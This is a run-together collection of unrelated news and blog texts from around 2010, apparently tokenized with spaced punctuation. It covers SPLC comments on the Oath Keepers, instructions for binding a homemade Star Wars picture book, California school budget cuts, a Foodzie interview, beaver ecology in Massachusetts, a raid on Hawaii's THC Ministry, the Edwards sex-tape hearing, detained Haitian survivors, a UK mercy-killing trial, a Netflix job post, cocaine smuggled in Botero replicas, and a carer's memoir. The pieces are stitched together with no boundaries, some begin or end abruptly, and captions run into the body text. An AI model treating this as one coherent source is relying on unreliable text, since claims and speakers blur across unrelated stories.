While this frequently involves individuals active in both types of groups , he says , ideas from the Patriot movement , such as conspiracy theories and the need to resist the government by force , are increasingly transmitting to tea party groups .
Potok expresses particular concern about a group founded last year , the Oath Keepers – military and law enforcement officers who , under the guise of pledging to uphold the U.S. Constitution , base their program on conspiracy theories that martial law will be imposed and Americans herded into concentration camps .
“ What is really worrying about a group like the Oath Keepers is this is a group of people who are armed by the rest of society , ” Potok says .
“ If these are men and women animated by ideas that are completely false , paranoid and groundless , you ’ve got to worry about who they are going to see as the real enemy and what kinds of decisions they make in stressful situations . ”
Asked in a telephone interview about the relation between the far right upsurge and recent racist incidents on college campuses , Potok pointed out that these are “ really just a reflection of what is happening in the larger society . ”
FBI hate crime statistics show that high school and college campuses are the third largest venue for hate crimes , he said , after inside people ’s homes and on the street , and account for about 10 percent of hate crimes .
“ One of the nastiest aspects of what ’s going on right now is the role mainstream aiders and abetters play in this , ” Potok said .
A campaign by civil rights organizations including the Southern Poverty Law Center , as well as many individuals , forced Lou Dobbs ’ resignation from CNN , he said .
While SPLC ’s report does n’t affect Minnesota Congresswoman Michele Bachmann at all , he added , hundreds of people from her district calling her out on her false allegations “ has the real potential to make her stop . ”
Photo : From a September rally of tea partiers in Chicago .
Chicago Man/ http://www.flickr.com/photos/usachicago/
/ CC BY-NC-ND 2.0
Dilemma :
The first birthday of our friends ’ child was approaching , and little Alaster already had more than enough stuffed animals and blinking , beeping electronic doo - dads .
Solution : Ignore work for three or four days and illustrate a Star Wars - themed take - off on a beloved children ’s book instead .
Added bonus :
It will also make a great gift for our own forthcoming Little One .
Result : I think the parents liked it more than Alaster , who was probably still reeling from his first sugary birthday cake experience .
And I ’m not sure , but I may have detected traces of jealousy on the faces of other parents in the room .
However , rather than publish and sell copies of this as was suggested , I ’m much happier releasing it freely to the world .
The catch : you have to print and assemble it yourself .
But do n’t worry , I wo n’t leave you high and dry ... following are step - by - step instructions to produce a good quality book with a minimum of fuss .
Step 1 : Download .
Grab the PDF of the book here .
Step 2 : Print .
Burn the PDF onto a CD , or otherwise take it to a decent Kinko ’s ( not one of the common , mere copy centers ) or better yet , your local service bureau / reprographics house , and ask them to make color laser prints ( may be referred to as Fiery prints ) on 100 lb. paper ( the heavy paper is important ) .
I strongly recommend that you see color proofs before the final product , but if you are in a hurry like I was , the PDF is relatively fail - safe enough that you may opt to waive that step .
You may also want to print 2 or more copies , so that you have a back - up for every page in case of problems during assembly .
Step 3 : Get supplies .
Since you ’re already out and about , go shopping for supplies , preferably from your local independent art supply store , although some of the larger office supply store may carry most or all of these items .
Online shopping will also work .
Dry adhesive , which is easier , cleaner , better smelling , and healthier than spray mount ; may come in sheets like these or as a roll
X - acto knife and at least a 5 - pack of replacement blades .
An Olfa snap knife will also do quite nicely
A burnisher
A nice , metal straight edge or ruler , if you do n’t already have one
A self - healing cutting mat ( optional , but recommended )
Step 4 : Score the pages .
Place your straight edge along the dashed - line marks in the center of each page , leaving a millimeter or so of space between the ruler ’s edge and the dashed lines .
Run a paper clip along the edge 4 or 5 times , pressing firmly .
Repeat for each page , ignoring the cover for now .
Optional : create an easy - to - hold scoring tool by snipping off the and of a small paper clip and inserting it into X - acto knife in place of the blade .
Step 5 : Apply the adhesive .
Take a dry adhesive sheet , peel off the waxy protective overlay , and lay it down on your work surface sticky side up .
Place a page face - up on top of the adhesive sheet ( so that the back of the page is in contact with the sticky side ) , then place the waxy sheet over the top of your page .
Using your burnisher , apply light pressure over everything , starting from the center and moving outward , using greater pressure with every stroke .
Repeat for all pages , including the cover .
Save the waxy sheets .
Once you have made that first , light , center - to - edge burnish , you may rub back - and - forth in any direction .
Be sure to burninsh thoroughly and firmly over the edges and corners of the page , as indicated by the trim marks ; this will help hold your book together for many years .
Step 6 : Cut the pages .
Place your straight edge along the solid - line marks ad the four edges of each page , this time trying to place the ruler ’s edge right on the very center of each trim mark .
Hold the ruler firmly , making sure not to let the edges of your thumb or fingers hang out over the edge .
With light pressure , pull the X - acto or Olfa knife down along the straight edge , stopping before the end of the paper .
Repeat the downward motion of the cut ( do not go back - and - forth as with scoring ) a couple of times until the paper has been fully and cleanly trimmed .
Do this along each of the four edges of every page , including the cover .
Change the blade of your knife every 3 to 5 pages ; as this is 100 lb. paper , the blades will dull fairly quickly .
Note :
By pressing lightly on the blade and repeating the cut until complete , you will be sure to maintain control and make a straight cut .
If you press firmly on the blade , you run the real risk of losing control and cutting into the page , and you will have to start over with a new page .
Also ,
Make sure that you do not cut through the paper , as you will be unable to properly line up your straight edge over the trim marks if you do .
As a rule of thumb , you ’ll want to stop your cutting stroke once the blade reaches into the trim marks .
It helps to keep all pages in order .
Step 7 : Assemble the pages .
( A ) Starting with the last page , fold the page in half ( this is where scoring the pages first comes in handy ) .
( B ) Use your burnisher to create a firm crease .
( C ) Peel away the adhesive backing to expose the adhesive , exposing only the first page ( the left half of the unfolded sheet ) .
Repeat steps
A through C for the previous page ( if you did not keep the pages in order , you may have to refer to the PDF to find which is the previous page ) .
Instead of exposing the left half of the sheet , however , you will expose the right half .
( D ) Lay one of the waxy sheets on top of the exposed adhesive of the last page , leaving about an inch of the adhesive still exposed .
Lay the previous page down on top , with its adhesive side pressed against the other ’s adhesive side , taking care to line up the edges and corners straight .
Pull the waxy “ slip - sheet ” out from between the two pages , and burnish the two halves together .
Again , begin with light pressure , from the center outward .
Once it it initially burnished , thoroughly and firmly burnish the entire area , concentrating on the edges and corners .
By placing a “ slip - sheet ” between the two adhesive areas , you will be able to make minor adjustments to the positioning of each page when lining them up .
Once the entire area of two adhesive sides are placed together , you will not be able to reposition them .
Repeat all of Step 7 for each page , excluding the cover , lining up the adhesive on the back of each page with the adhesive on the back of its opposite page .
Step 8 : Assemble the cover . ( A ) Using the same slip - sheet technique as before , line up the edge of the front cover with the edge of the first page , adhesive - back - to - adhesive - back , and burnish firmly into place ( place one of the waxy sheets over the cover to burnish so that you do n’t scratch the print ) .
( B ) Turn the book over , and fold over the back cover so that its edge is aligned with the edge of the last page .
Burnish firmly , atop another protective waxy sheet .
( C ) Congratulations , your book is now complete !
Since you did not score the cover , the spine should naturally curve outward when the book is opened , and lie relatively flat against the pages when the book is closed .
Optional final step :
You may also want to place a heavy weight on top of the book ( placing another protective sheet between the book and the eight ) and let that sit for a few hours .
This will help ensure that all pages are firmly adhered to one another .
February 1 , 2010
John Green , a teacher in California , looks at the facts about Arnold Schwarzenegger 's new budget proposal -- and explains how easy it would be to protect our schools .
" As bitter as the words are in my mouth , we face additional cuts ... But I am drawing this line .
Because our future economic well - being is so dependent upon education , I will protect education funding in this budget .
And we can no longer afford to cut higher education either . "
-- Gov. Arnold Schwarzenegger , State of the State address , January 6 , 2010
APPARENTLY , GOV .
Arnold Schwarzenegger and I interpret the word " protect " differently , because two days later , he released his proposed 2010 - 11 budget that includes at least $ 1.8 billion in direct cuts to K - 12 schools .
Did he raise our expectations just so that his actual announcement would hurt that much more ?
No wonder a new poll puts his popularity at 27 percent .
The governor 's proposals are a bit baffling , but here 's an outline .
1. Fully " fund " a negative cost - of - living - adjustment ( COLA ) at - 0.38 percent .
The negative COLA proposal will amount to about $ 250 per student , which is equal to the so - called " one - time " cut of $ 252.83 per pupil that school districts endured last year .
In other words , this cut completely throws out all of last year 's local budget scenarios and predictions .
2. Cut " school district central administration " by $ 1.2 billion .
This " chop from the top " proposal does n't specify cutting outrageous superintendent salaries -- only a reduction in funds for central offices .
Will low - level administrators simply be bumped into school sites and dislocate younger teachers ?
What about districts that initiated some sort of central office cuts last year already ?
3. $ 300 million reduction by eliminating barriers to " contracting out . "
In other words , the governor wants to make it easier for school districts to bypass unionized employees ( and their pesky collective - bargaining agreements ) by contracting for services from outside providers .
Most likely , this will mean taking on SEIU and CSEA , who represent classified employees such as custodians and secretaries .
4. Accounting tricks to lower future Prop 98 minimum funding guarantees .
California 's voter - approved Proposition 98 guarantees that a minimum of 40 percent of the state 's general fund be spent on K - 14 education .
Cold comfort while the general fund shrinks each year , but Gov. Schwarzenegger still proposes to eliminate the state 's gas tax in favor of a " fee , " causing gasoline sales revenue to bypass the general fund altogether .
5. Additional " flexibilities " inspired by the Obama administration 's Race to the Top funds .
The governor 's budget proposes to eliminate seniority in layoffs , transfers and rehires ; eliminate laid - off teachers ' first priority for substitute assignments ; and reduce the school year by up to five days .
Simply put , seniority rights protect older employees from being targeted due to union activity or earning higher pay .
THESE PROPOSALS make clear that any attempt to " ride out " the storm just wo n't work .
Not only is this strategy insulting to teachers facing layoffs right now and students losing out on an education , but California is getting ready to permanently dismantle fundamental rights of teachers .
It is worth mentioning that the bulk of Mr. Schwarzenegger 's cuts this time around target health and human services .
As our kids ' lives neither begin nor end at the classroom door , the loss of quality welfare programs in California will hurt children just the same as laying off school employees .
Last year 's federal stimulus legislation offset some of the education cuts in California .
We deserve a lot more help , like the kind of money that 's been thrown at Wall Street and the wars in Iraq and Afghanistan .
Both of California 's senators are ranking Democrats , and House Speaker Nancy Pelosi hails from San Francisco .
Political pundits think California has zero chance of netting any federal funds ( Mr. Schwarzenegger is relying on at least $ 6.8 billion ) , which is absolutely ridiculous .
Whatever cuts occur this year , there will be plenty of blame to go around politicians of both parties .
Proposition 13 also needs to be repealed .
It requires a two - thirds vote to raise taxes , but only a simple majority to reduce them .
It requires a two - thirds vote to accept a budget , allowing the Republican minority to hold everyone hostage and giving the Democratic majority a convenient object to blame for the crisis , while sidestepping the issue of seriously raising taxes on the wealthy .
Why eliminate school days when we could eliminate Proposition 13 ?
Why pull funding from school districts when we should pull out of Afghanistan ?
Why raise a generation of children with a broken education system when we could just raise taxes on the wealthy ?
This is obviously a tall order , so here 's a place to start :
The March 4 statewide day of action to defend public education .
Initiated by student activists , and now supported by both the California Federation of Teachers and California Teachers Association , this could become the biggest day of resistance we 've seen so far .
Now is the perfect time to ask our local unions to endorse March 4 and set up organizing committees to turn out educators , parents and students for protest and discussion .
advertisement
advertisement
San Francisco - based online artisan food market Foodzie operates on a direct - to - Web consumer model in an effort to strengthen the relationship between sellers and consumers–all while providing the freshest food possible .
The Foodzie team recently celebrated its first year in business , during which time it received $ 1 million in funding .
Co-founder Emily Olson shares Foodzie ’s vision to help small producers to be a bigger part of the nation ’s regional food system .
Fast Company :
What ’s your definition of sustainable food ?
Emily Olson : At Foodzie , our definition of sustainable food is multi-dimensional .
We believe that a truly sustainable food ecosystem requires a balance of economic , environmental , and social viability .
We at Foodzie strive to help our producers build successful businesses ( economic sustainability ) , source clean ingredients from local growers , utilize eco-friendly packaging ( environmental sustainability ) , earn fair compensation for their products , and donate a portion of sales to local charities in their communities ( social sustainability ) .
We believe that these factors are inextricably bound , and greatly impact the sustainability of our food system .
FC : What would you say is the biggest challenge facing sustainable food right now ?
EO : Economically , we need to ensure that our producers and growers are able to build sustainable businesses .
This requires that small producers have the resources and access to bring their products to market .
Environmentally , we need to encourage those same artisans to make responsible decisions about how they grow , produce , package , and distribute their products .
Socially , we need to improve access to healthy and nutritious foods , and support fair compensation for foodmakers .
FC : How is Foodzie helping to boost sustainable food ?
If you could only make one recommendation to consumers regarding sustainable food , what would it be ?
advertisement
EO : Food production is a key part of our ecosystem and we ’re constantly trying to use technology to be more efficient and help businesses grow .
For example , we often conduct interviews with our producers and growers on Foodzie ’s blog to give customers a better sense of what goes into the production of the goods shown on the site .
Additionally , sellers have always been able to post their goods for free and Foodzie collects a 20 % commission rate on all sales , meaning they end up with a much larger percentage of the sale than if they had turned to a larger retailer .
Consumers have the incredible power to “ vote with their forks ” three or more times per day .
Help to increase the vibrancy and sustainability of your regional food system–go and support small , passionate food artisans !
FC : Would you say the recession has affected people ’s interest in buying locally grown and handmade food ?
EO : Historically during recessions , people tend to cut out the vacations or eating out , but will treat themselves to the small indulgences .
We definitely see people enjoying artisan chocolate bars , handmade caramels , and other items that fit into that category .
We have seen the local food movement continue to grow through the recession ; it ’s on track to have a similar growth rate that organic foods saw a few years back .
FC : Foodzie has been described as the “ the Etsy of food ” in that like the online craft fair , you ’re a virtual farmer ’s market .
What sets Foodzie apart from similar businesses ?
EO :
The direct connection we have to the site ’s visitors .
This is n’t solely limited to consumers–we also have a traceable connection to the people making the food , and as a result , customers feel good that they ’re supporting a small producer .
A lot of our sellers might just be getting started , or they may have a small local following and are looking to go beyond the few customers they have .
Foodzie sellers also have the ability to produce items in small batches , and in turn , more opportunities to flex their creative muscles .
advertisement
FC : Foodzie is just over a year old and has already accumulated 250 vendors and approximately 85,000 visitors per month .
What factors go into your consideration of prospective sellers ?
EO :
We look for small businesses with an artisan way of creating products and an owner who is directly involved with the product creation .
We also look for foods that are not mass - distributed and made with high - quality ingredients .
Our team tests everything that goes on the site , sometimes even through community tastings in our office .
This is important to us because if there ’s something that no one likes , it means something .
And , of course , we look for great stories from passionate people–all key factors that go into making some of the best food you can find .
FC : Where did you get the idea for Foodzie ?
EO : I was working as a brand manager at [ specialty food chain ]
The Fresh Market and saw firsthand how hard it was for small producers to break into big retailers , even with their awesome stories and top-quality products .
I wanted to make a place in which producers could directly connect with customers .
This was challenging because the direct - to - consumer model is broken for small producers .
There are so many middlemen like distributors and brokers–all of which come with fees .
Simply getting products into the store is hardest part for sellers , as the current system inhibits small producers from making it into stores .
Small producers are primarily focused on making the product , which is what they ’re good at .
The marketing aspect takes a lot of time and getting out there is tough , which is where Foodzie comes in .
FC : What are some of Foodzie ’s bestsellers ?
EO : One of the things that makes Foodzie so unique is that we offer many “ undiscovered ” products you usually can’t find anywhere else , such as Gobba Gobba Hey treats ( Whoopie Pie - like confections , called “ gobs , ” made with all - natural ingredients and offered in exotic flavor combinations ) , which I was just munching on .
advertisement
Another popular “ Foodzie find ” is Skillet Street Food ’s Bacon Jam–over the holidays , we literally sold a ton of jars of the stuff .
This spread is comprised of bacon , onion , brown sugar and spices , and is commonly smeared on burgers , scrambled eggs , or even used for “ double-bacon BLTs . ”
The name might seem strange , but if it has bacon in it , it ’ll sell .
FC : What did you have for breakfast today ?
EO :
It was a color - infused breakfast : I had a Naked Superfood “ Green Machine ” Smoothie and Gobba Gobba Hey ’s new Matcha Green Tea gob .
Our car rolls slowly down a dirt road in central Massachusetts .
A leafy canopy of oak and red maple arches overhead , dripping from recent rains .
Two broad ponds flank the road , and a beaver lodge rises in each one .
The shaggy domes , each about ten feet across , are built from cut branches and sealed with mud .
Between the ponds , the road lies under several inches of water .
“ They ’ve plugged the culvert .
The watershed managers wo n’t like that , ” says Boston University biologist Peter Busher .
His grin signals which side he ’s on .
We park and slosh forward on foot to investigate .
Standing ankle - deep at the crime scene and peering down , we can see that beavers , probably spurred to action by the sound of running water , have jammed the drain under the road with sticks and wads of grass .
Busher thinks that both lodges belong to one family group that moves back and forth between the ponds .
Plugging the culvert allows them to swim across the road instead of climbing out and walking across .
Their dam wo n’t last long — state foresters will clear the culvert — but every bit of trouble the beavers cause here is data for Busher .
The ponds are on Prescott Peninsula , which juts into the Quabbin Reservoir , a 25,000 - acre lake that provides drinking water for metropolitan Boston .
The narrow , ten - mile - long peninsula is a restricted area , accessed mainly for water testing and selective tree - cutting .
The longest - running beaver population study began here in 1969 , and Busher has been tracking the Prescott Peninsula beavers ’ numbers and behavior since 1982 .
He and other scientists studying beavers around the country have discovered that the animals provide valuable habitat for many other species , and do it very cheaply .
Beavers have long been recognized as the engineers of the forest , constantly reshaping their surroundings .
“ One has but to observe a community of beavers at work in a stream to understand the loss in his sagacity , balance , co-operation , competence , and purpose which Man has suffered since he rose up on his hind legs , ” wrote humorist James Thurber in 1939 .
The Massachusetts Institute of Technology chose beavers a century ago as mascots because , like MIT students , they were skilled engineers and nocturnal workaholics .
Like other rodents , beavers have large front teeth that never stop growing , so the animals never stop gnawing .
They eat bark , leaves , roots and twigs from a variety of trees , with a preference for aspen and sugar maples as well as waterlily roots .
They feed primarily on the cambium , a layer of soft living tissue under the bark that carries moisture and nutrients to the tree ’s leaves and branches .
Beavers mate for life and live in colonies that usually number five or six — a breeding pair , several kits , and one or two yearlings that will move out at age 2 .
They are territorial , so one family group wo n’t typically share a pond with another colony .
When beavers move to a new area , they tunnel into pond or stream banks , break through to the surface and start piling sticks on top of the hole to build a lodge .
Next they cut down branches and use them to dam the stream so that water rises around the lodge , creating a protective moat .
Before European settlement , an estimated 60 million beavers ranged across North America .
As recently as 1600 , beaver ponds covered more than 10 percent of the territory around the upper Mississippi and Missouri rivers .
Their ponds stored water and sustained stream flows .
But English , French and Dutch explorers prized beavers for another reason : their dense , water - resistant fur .
Lewis and Clark kept careful records of wildlife sightings as they explored Louisiana Purchase lands from 1803 through 1806 ; their reports of abundant beavers along the upper Missouri and Yellowstone rivers spurred 30 years of intensive trapping across the Great Plains .
Beavers had been hunted and trapped close to extinction across most of the continent by 1840 .
In the early 1900s , however , conservationists and sportsmen began to lobby for reintroduction programs and trapping limits .
Massachusetts reintroduced beavers starting in 1932 , when no beavers were known to live in the state .
It now has an estimated 70,000 .
Today there ’s growing awareness that beavers do n’t just rearrange ecosystems–they make them healthier .
Their dams create wetlands that take up floodwaters , preventing flash floods .
Studies in Colorado and Canada have shown that beaver ponds make droughts less devastating by raising groundwater levels and keeping soils moist in the absence of rain .
Land managers in several Western states are studying beaver restoration as a way to slow spring runoff from melting snow ( recent droughts and warmer spring temperatures have made it more difficult to store water into the summer in many parts of the West ) .
Beaver ponds also filter out sediments and pollutants , says Laura Hajduk , a biologist with the Massachusetts Division of Fisheries and Wildlife .
" They ’re great purifiers .
Often the water that comes out is cleaner than what went in . ”
And beaver ponds provide habitat for many types of animals .
That ’s evident as Busher and I hop across the flooded culvert .
A great blue heron flaps up from nearby marsh grass , and we hear the deep , hollow thrum of a pileated woodpecker boring into a tree .
When we climb from the bank onto a cement - hard beaver lodge , newts scramble for cover in the shallows .
Broken eggshells are scattered underfoot –the remains of a snapping turtle nest on top of the lodge , raided by an unknown predator .
Browsing moose have left massive tracks in the mud .
“ It ’s much more diverse here than it would be if the land was drained , ” says Busher .
“ But you do lose some trees . ”
Standing dead trees , killed by rising waters , are a feature of beaver ponds , along with gnawed - off stumps .
But those dead trees provide homes for wood ducks and other cavity - nesting birds .
And plenty of healthy hardwoods remain around the ponds , including some large maples growing right at the water ’s edge .
It ’s not always this tranquil when beavers move into human neighborhoods–an increasingly common occurrence across much of the United States .
Here in the Northeast , forests have regrown over the past century as farming has declined , providing more beaver habitat , and hunting and trapping are limited in many areas .
In Massachusetts , which banned most types of traps in 1996 , beaver dams regularly flood roads , backyards and septic systems .
Under state law , beavers can be trapped when their activities threaten human health or safety .
“ Flooding sewer systems or wells , or damaging the structural stability of buildings , are the kind of impacts that justify trapping , ” says Hajduk .
But her agency advises that when beavers are simply an inconvenience , “ tolerance is the best solution . ”
Fencing off ornamental trees and shrubs and installing specially designed pipes in dams to regulate water flow can reduce property damage .
Busher thinks many of the problems beavers are now causing for homeowners may be temporary .
When beavers reappeared on the Prescott Peninsula in 1952 , the number of colonies grew very slowly at first .
Then the population spiked from 16 groups in 1968 to 46 in 1975 and remained high for nearly a decade .
By 1992 , however , it had plunged to 10 colonies , and since then it ’s never risen higher than 23 colonies .
“ At the high point they were using every marginal spot , but that was n’t sustainable , ” says Busher .
Once beavers ate all of the available plants in marginal areas , some left the peninsula , failed to breed , or died .
Now the population is more stable .
He ’s documented a similar pattern of rapid growth followed by decline in California 's Sierra Nevada .
If that model holds true in the suburbs that beavers are now infiltrating , flooding problems may ease over the long term as beaver populations stabilize .
When beavers abandon a site , their ponds and marshes start to fill up with silt and eventually become “ beaver meadows , ” which provide habitat for many species of grassland birds .
Farther down the peninsula we see abandoned dams covered with vegetation and ponds where water levels have dropped .
Some of the lodges have holes in them , and they have no food caches — piles of freshly cut branches , some with leaves still on — that typically stretch out in front of an active lodge .
At the last pond , runoff from heavy rains cascades over a beaver dam that ’s at least five feet high and 50 feet long .
The beavers that built this dam moved upstream after watershed managers broke down a smaller dam that threatened to flood an access road – one of the few times Busher has seen beavers give up on a location so quickly .
“ It ’s not always obvious why they choose one spot over another , or move on from what looks to us like a perfectly nice pond .
They ’ve got their own aesthetics , ” he says .
Hilo , Hawaii – Video by David Corrigan
THC Ministry founder and director Roger Christie seems to be doing OK after a recent run in with federal agents at his home and downtown Hilo cannabis sanctuary .
On Thursday , the Hawaii Tribune - Herald broke the news that the well known
Hilo landmark had been raided by feds with the assistance of local Hawaii police .
According to reporter John Burnett , the Assistant U.S. Attorney Tom Muehleck said that no one had yet been arrested or charged in connection with the raid , but Muehleck provided no details .
In the above interview , conducted inside the THC Ministry a few days after the incident , Christie confirms the information , and also confirms that raids were conducted on other Hawaii residents ’ homes .
The common denominater , Christie said , appeared to be connections to the THC Ministry .
Christie also believes the investigation is geared more towards financial and tax issues than the use of marijuana .
Christie says he sees this as the latest challenge in his quest to fully legitimize the ministry , which provides what its members refer to as the sacrament of cannabis .
He believes the United States Constitution protects the religious use of marijuana .
The THC Ministry has been in operation for years , and has until now seemed to exist legally in the eyes of state and local authorities .
Christie points to his state issued license to officiate wedding ceremonies in Hawaii .
The raid comes as the Hawaii legislature considers allowing medical marijuana dispensaries .
The bill , which has already passed through the state Senate , would levy a $ 30 per ounce tax on medical marijuana , and would bring raise an estimated $ 50 million per year for the financially ailing state .
Other laws being considered by the state would eliminate criminal penalties for marijuana possession , and allow medical marijuana patients to have more plants and ounces of the herb .
At the same time , a Clear Creek County Court in Colorado convicted a THC Ministry member of a misdemeanor possession of marijuana a few days prior .
Christie says Trevor Douglas , the defendant who tried argue that the marijuana was for religious needs , joined the ministry only after his run in with the law .
There is a Colorado chapter of the THC Ministry .
Christie says he believes the raid and the Colorado court conviction are not related .
Ex -Edwards Aide Given Deadline Over Sex Tape Judge threatened to send Andrew Young and his wife to jail for lying about tape .
March 9 , 2010  -- Former John Edwards aide Andrew Young and his wife Cheri , dodged a trip to jail today over their handling of a purported sex tape allegedly made by the one - time presidential candidate and his mistress , according to ABC's WTVD - TV .
After ordering the Youngs to go to jail for up to 75 days for contempt of court , Superior Court Judge Abraham Penn Jones changed his mind and gave the couple until Friday to hand over any missing items , including any copies of the tape and to provide an explanation for how they handled the materials .
Superior Court Judge Abraham Penn Jones said that he held the Youngs in contempt because he believes they were not truthful about the disposition of the items he ordered the Youngs to turn over .
" There were things told to the court under oath , in affidavits , in testimony that turned out to be inaccurate .
Right now , part of me says they did n't tell me the truth before in this court , " Jones said , according to the Raleigh News and Observer .
At today 's hearing , lawyers for Edwards ' mistress , Rielle Hunter , accused Young of lying and contended that he has not handed over all materials that the court demanded in the judge 's Feb. 5 contempt order .
The ex-aide handed over the alleged sex tape , along with additional items , including a CD of photos , to the court last month , but Hunter 's lawyers said copies of the tape could be missing .
Young 's lawyers maintain that he turned over all copies of the tape to the court last month , except for a copy of the tape that was given to the FBI in Washington , D.C. , as part of a grand jury investigation into Edwards ' campaign finances .
Hunter 's lawyers produced a new affidavit from freelance journalist Roger Draper , who said in a statement that Young showed him the tape in March 2009 .
Young failed to mention in his own affidavit that Draper had been shown the tape .
His lawyers cited memory lapse for the oversight .
Young and his wife Cheri will testify later today on what Jones identified as discrepancies in their statements .
Today 's hearing was the fourth in the more than month - long legal battle over the tape .
Click here for complete coverage of the John Edwards scandal .
Hunter , 42 , was granted a temporary restraining order last month to prevent Young from distributing the tape and other photos , which she contends are her property .
The judge has yet to rule on ownership , but gave Youngs ' new legal team permission to view the tapes in the court 's posession .
Hunter 's attorneys say this a continued invasion of her privacy .
Sex Tape Revealed in Young 's Book
The existence of a sex tape , along with other revelations on Edwards ' affair and allegations of an expensive cover - up of Hunter 's pregnancy , came to light in Young 's new tell - all book , " The Politician . "
Hunter said she made and hid a videotape that " depicted matters of a very private and personal nature " in or around September 2006 , according to an affidavit filed Jan. 28 , 2009 .
Young said the woman in the tape was noticeably pregnant .
While the woman 's face is not seen in the video , Cheri Young said the woman is wearing a bracelet and a thumb ring typically worn by Hunter .
Young , who had worked for Edwards since his 1998 Senate win , said he was absolutely sure it was Edwards in the tape .
In a second affidavit , submitted after Young had handed over copies of the tape to the court , Hunter said that after viewing the tape , she was able to recall when and where the tape was made and that she was not pregnant at the time .
She called the Youngs ' public assertions to the contrary lies .
Hunter claimed the video was left in a hatbox where she kept personal items , like her passport , in a house that the Youngs rented for her .
The Youngs said the video was found in a box of trash in their own home after Hunter stayed with them for several weeks in 2007 .
Young told ABC News that he'd been offered a " gigantic " amount of money to sell the tape .
Hunter also has filed suit against the Youngs to seek damages for invasion of privacy .
Tamara Gibbs of ABC's Raleigh affiliate WTVD and The Associated Press contributed to this report .
Advocates for the detainees said they had been told for weeks that deportation officers in Florida were waiting for senior officials in Washington to set a policy for the group .
Most were ordered deported in February , but are eligible for release under an order of supervision until deportations resume .
“ Their prolonged and unnecessary detention is only exacerbating their trauma , ” the advocates wrote to the agency on March 19 , after receiving no response to detailed , individual requests for release by two dozen of the detainees .
“ There is no reason to spend taxpayer dollars detaining traumatized earthquake survivors who cannot be deported and who have demonstrated that they are neither a flight risk nor a danger to the community . ”
The government ’s actions have been especially bewildering for the survivors ’ relatives , like Virgile Ulysse , 69 , an American citizen who keeps an Obama poster on his kitchen wall in Norwalk , Conn .
Mr. Ulysse said he could not explain to his nephews , Jackson , 20 , and Reagan , 25 , why they were brought to the United States on a military plane only to be jailed at the Broward center when they arrived in Orlando on Jan. 19 .
“ Every time I called immigration , they told me they will release them in two or three weeks , and now it ’s almost three months , ” said Mr. Ulysse , a retired carpenter and architectural designer who said he had always warned his relatives in Haiti not to come illegally on boats , but to wait for a green light from the United States .
On March 11 , Reagan was abruptly transferred , and for days his younger brother did not know where he was .
It turned out he had been taken to the Baker County jail , in Macclenny , Fla. , six hours away .
On Tuesday evening , a paralegal found him there in shackles , about to be transferred again ; guards , following government protocol , would not say where .
“ His brother is far away — he ’s waiting , waiting , ” Mr. Ulysse said of Jackson .
“ He started to cry on the phone .
It ’s very terrible . ”
Thomas Inglis suffered severe head injuries in 2007 A mother accused of murdering her disabled son has described in court how she told him that she loved him before administering a heroin overdose .
Frances Inglis , 57 , of Dagenham , Essex , denies murdering Thomas Inglis , 22 , on 21 November 2008 and an earlier attempt to kill him on 4 September 2007 .
Mr Inglis was fatally injected with heroin at his Hertfordshire care home .
The Old Bailey jury heard she injected his arm and thighs after saying : " Everything 's going to be fine . "
She was giving evidence about the moment she allegedly attempted to murder her son Tom in September 2007 in a bid to end his suffering .
The Old Bailey has heard that Ms Inglis went on to succeed in killing the 22 - year - old in November 2008 .
I asked myself what Tom would want .
He would n't have wanted to live like this
Frances Inglis
His mother said : " I held him , told him I loved him , told him everything was going to be fine , took the syringe , and I injected him in his thigh and his arm .
" Then he went to sleep .
He was at peace .
I stayed with him . "
The defendant said she was convinced that the doctor treating her son at Queens Hospital in Romford , Essex , was lying about his chances of recovery .
He was left helpless after suffering severe head injuries when he fell out of an ambulance in July 2007 , the jury has heard .
Ms Inglis said : " I knew I had to help him .
I asked myself what Tom would want .
He would n't have wanted to live like this .
Frances Inglis said she wanted her son to have a painless death " I asked myself what I would want .
I would want someone to love me enough to help me die .
" That 's why I thought heroin - a painless , peaceful death . "
Ms Inglis told the court she had started to research her son's condition on the internet within days of his accident .
She also claimed she had to beg hospital staff to give him some relief for his " terrible pain " .
Ms Inglis , who said she used to visit her son twice a day , was asked by her barrister Sasha Wass QC about the " encouraging " prognosis described by consultant surgeon Ragu Vindlacheruvu .
He had suggested " that Tom would be running his own business , walking , talking , independent , totally opposed to what everyone else had said and what I had seen with my own eyes " , said the defendant .
" All I saw was horror , pain and tragedy , " she said .
She added : " I knew that Dr Vindlacheruvu was lying . "
The case was adjourned until Friday .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
Netflix will stop at nothing , we say -- nothing -- until you have the ability to watch films like Failure to Launch and Salo or the 120 Days of Sodom on every conceivable device in your possession .
It 's hit the Wii , it 's coming to the iPhone , and now ?
That 's right , the kids at Los Gatos want YOU to help " build Instant Streaming client implementations on Android devices . "
Are you " a senior engineer with a strong background in embedded and mobile development , specifically on media - enabled devices , " with over ten years experience , hands - on experience with media playback on the Android platform , and a knack for DRM technologies ?
You 're in luck !
Hit the source link to get started .
And if you do get hired , make sure you keep us in the loop as things progress .
You owe us at least that much , right ?
[ Thanks , jt.shen ]
Many of Botero 's statues are of oversized figures
Police in Colombia say they have found 16kg ( 35 lb ) of cocaine inside replicas of three sculptures by artist Fernando Botero being shipped to Spain .
The cocaine had been mixed into the clay of the sculptures as they were being cast , police said .
No arrests were made during the operation .
The statues were found in a Bogota warehouse ahead of shipment to Madrid .
Colombia 's cartels are using ever more sophisticated smuggling techniques as they target more European markets .
Prices for cocaine are higher in Europe than the US and the chances of extradition much lower , say correspondents .
" This is a sophisticated concealment system for the drugs in replicas of sculptures by a renowned Colombian artist , " a police statement said .
How does a wife cope with a husband terribly injured by war ?
Sue could n't ... and walked away
On a bright winter 's morning in January 2007 , I found myself in a busy car park in Cheltenham with my family .
I noticed how happy and relaxed everyone else seemed .
Occasionally , a small child would stare in our direction before their parent whispered to them to look away or shot us a sympathetic glance .
I looked down at my husband , Pete , sitting in his wheelchair in front of me , one arm and a leg missing .
On Pete 's lap was our eldest son Tom , then four , pushing his two - year - old brother Toby forward in his pram as I took the weight of all three of them .
We must have been a bizarre sight .
But by then I was almost beyond caring .
Overwhelmed : Sue Norton found being a mother and carer a huge strain
My back ached continually , as it seemed to have done for months .
Worn down by nearly two years of struggling with the demands of bringing up two small boys and caring for a severely disabled husband , I knew I was near breaking point .
That evening , after I had put the boys to bed , I told Pete that I wanted to move to Essex to be nearer to my parents , so they could help me when he finally finished his year of rehabilitation and came back home to live with us full - time .
Communication had been difficult between us for months .
